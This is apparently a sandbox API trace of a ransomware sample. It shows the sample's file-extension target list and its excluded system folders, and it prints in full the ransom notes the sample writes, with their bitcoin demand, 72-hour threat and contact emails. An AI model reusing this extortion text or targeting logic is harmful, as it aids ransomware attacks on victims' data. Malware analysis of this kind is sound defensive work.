	[0190.196] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ini") returned 0x0
	[0190.196] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x43079e90, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0
	[0190.196] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0190.197] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0190.197] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links") returned="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links"
	[0190.197] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\*.*"
	[0190.197] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0190.197] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0190.198] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\HELP_DECRYPT_YOUR_FILES.TXT") returned 65
	[0190.198] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\links\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0190.229] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0190.229] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0190.232] CloseHandle (hObject=0x384) returned 1
	[0190.264] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0190.264] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.265] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0190.265] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0190.265] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\links\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0190.265] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0190.265] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0190.266] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0190.266] CloseHandle (hObject=0x384) returned 1
	[0190.266] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0190.266] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0190.266] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0190.266] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\HELP_DECRYPT_YOUR_FILES.HTML") returned 66
	[0190.266] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\links\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0190.267] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0190.267] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0190.268] CloseHandle (hObject=0x384) returned 1
	[0190.269] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.269] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0190.269] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0190.269] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0190.270] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0190.270] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\links\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0190.270] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0190.270] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0190.270] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0190.271] CloseHandle (hObject=0x384) returned 1
	[0190.271] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8aef1ebc, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0190.271] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\*.*") returned 41
	[0190.271] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0190.271] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\*.*", cchLength=0x29 | out: lpsz="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*") returned 0x29
	[0190.271] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.272] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="windows") returned 0x0
	[0190.272] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.272] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="boot") returned 0x0
	[0190.272] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.272] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="system volume information") returned 0x0
	[0190.272] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.272] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0190.272] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.272] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="temp") returned 0x0
	[0190.272] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.273] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="program files") returned 0x0
	[0190.273] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.273] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="program files (x86)") returned 0x0
	[0190.273] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.273] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="appdata") returned 0x0
	[0190.273] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.273] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="application data") returned 0x0
	[0190.273] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.273] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="winnt") returned 0x0
	[0190.273] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.274] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="tmp") returned 0x0
	[0190.274] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.274] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="cache") returned 0x0
	[0190.274] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.274] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="temporary internet files") returned 0x0
	[0190.274] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.274] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="webcache") returned 0x0
	[0190.274] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.274] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="inetcache") returned 0x0
	[0190.274] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.275] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="nvidia") returned 0x0
	[0190.275] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.275] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="packages") returned 0x0
	[0190.275] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.275] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="cookies") returned 0x0
	[0190.275] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.275] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\favorites\\links\\*.*", lpSrch="programdata") returned 0x0
	[0190.275] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0190.275] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0190.275] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8aef1ebc, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0190.276] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0190.276] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x43079e90, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0190.276] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aef1ebc, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8aef1ebc, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8af16b9b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0190.276] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ae7e195, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8ae7e195, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8aef1ebc, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0190.276] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ae7e195, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8ae7e195, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8aef1ebc, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0190.276] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0190.276] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0190.276] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 0
	[0190.276] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0190.276] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
